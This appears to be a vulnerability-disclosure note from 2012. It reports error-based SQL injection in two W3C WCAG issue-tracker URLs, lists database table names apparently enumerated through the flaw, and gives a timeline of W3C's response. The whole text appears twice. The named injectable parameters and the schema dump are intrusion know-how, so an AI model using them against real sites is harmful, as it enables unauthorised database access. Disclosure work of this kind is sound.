totallyunknown/sql-injection-w3c-nils-juenemann.txt

## sql-injection-w3c-nils-juenemann.txt
W3C.org was vulnerable to error based SQL injection:

http://www.w3.org/WAI/GL/WCAG20/issue-tracking/viewdata_individual.php?id=1
http://www.w3.org/WAI/GL/WCAG20/issue-tracking/resolutions/no_response_results.php?frum=%22

select table_name from information_schema.tables [55]:
[*] AC200011FollowUp
[*] acmfastsurvey
[*] ACSurvey200210
[*] CHARACTER_SETS
[*] COLLATION_CHARACTER_SET_APPLICABILITY
[*] COLLATIONS
[*] COLUMN_PRIVILEGES
[*] COLUMNS
[*] commentsTracker
[*] cookies
[*] dog
[*] ENGINES
[*] EVENTS
[*] FILES
[*] GLOBAL_STATUS
[*] GLOBAL_VARIABLES
[*] human
[*] KEY_COLUMN_USAGE
[*] messages
[*] PARTITIONS
[*] PLUGINS
[*] PROCESSLIST
[*] PROFILING
[*] prospective_members
[*] REFERENTIAL_CONSTRAINTS
[*] resource
[*] resources
[*] reviewedSpecifications
[*] ROUTINES
[*] SCHEMA_PRIVILEGES
[*] SCHEMATA
[*] SESSION_STATUS
[*] SESSION_VARIABLES
[*] specSections
[*] STATISTICS
[*] TABLE_CONSTRAINTS
[*] TABLE_PRIVILEGES
[*] TABLES
[*] testac
[*] testad
[*] testae
[*] toy
[*] toy2
[*] toy3
[*] TRIGGERS
[*] triples
[*] trrdf_id2val
[*] trrdf_store_var
[*] trrdf_triple
[*] trrdf_triple_dup
[*] uri
[*] USER_PRIVILEGES
[*] VIEWS
[*] wgOptions
[*] xpointerRegistry

Timeline:

15/10/2012 Initial Report
15/10/2012 Acknowledged by W3C
26/10/2012 Bugs still unfixed, asked again for status
27/10/2012 Got Feedback from W3C:

"Thanks very much for bringing this to our attention, and for
following up. Many of my colleagues are traveling this week but I
expect we will be able to get these fixed sometime within the
next few days."

Didn't know, when they exactly fixed these issues.
	W3C.org was vulnerable to error based SQL injection:

	http://www.w3.org/WAI/GL/WCAG20/issue-tracking/viewdata_individual.php?id=1
	http://www.w3.org/WAI/GL/WCAG20/issue-tracking/resolutions/no_response_results.php?frum=%22

	select table_name from information_schema.tables [55]:
	[*] AC200011FollowUp
	[*] acmfastsurvey
	[*] ACSurvey200210
	[*] CHARACTER_SETS
	[*] COLLATION_CHARACTER_SET_APPLICABILITY
	[*] COLLATIONS
	[*] COLUMN_PRIVILEGES
	[*] COLUMNS
	[*] commentsTracker
	[*] cookies
	[*] dog
	[*] ENGINES
	[*] EVENTS
	[*] FILES
	[*] GLOBAL_STATUS
	[*] GLOBAL_VARIABLES
	[*] human
	[*] KEY_COLUMN_USAGE
	[*] messages
	[*] PARTITIONS
	[*] PLUGINS
	[*] PROCESSLIST
	[*] PROFILING
	[*] prospective_members
	[*] REFERENTIAL_CONSTRAINTS
	[*] resource
	[*] resources
	[*] reviewedSpecifications
	[*] ROUTINES
	[*] SCHEMA_PRIVILEGES
	[*] SCHEMATA
	[*] SESSION_STATUS
	[*] SESSION_VARIABLES
	[*] specSections
	[*] STATISTICS
	[*] TABLE_CONSTRAINTS
	[*] TABLE_PRIVILEGES
	[*] TABLES
	[*] testac
	[*] testad
	[*] testae
	[*] toy
	[*] toy2
	[*] toy3
	[*] TRIGGERS
	[*] triples
	[*] trrdf_id2val
	[*] trrdf_store_var
	[*] trrdf_triple
	[*] trrdf_triple_dup
	[*] uri
	[*] USER_PRIVILEGES
	[*] VIEWS
	[*] wgOptions
	[*] xpointerRegistry

	Timeline:

	15/10/2012 Initial Report
	15/10/2012 Acknowledged by W3C
	26/10/2012 Bugs still unfixed, asked again for status
	27/10/2012 Got Feedback from W3C:

	"Thanks very much for bringing this to our attention, and for
	following up. Many of my colleagues are traveling this week but I
	expect we will be able to get these fixed sometime within the
	next few days."

	Didn't know, when they exactly fixed these issues.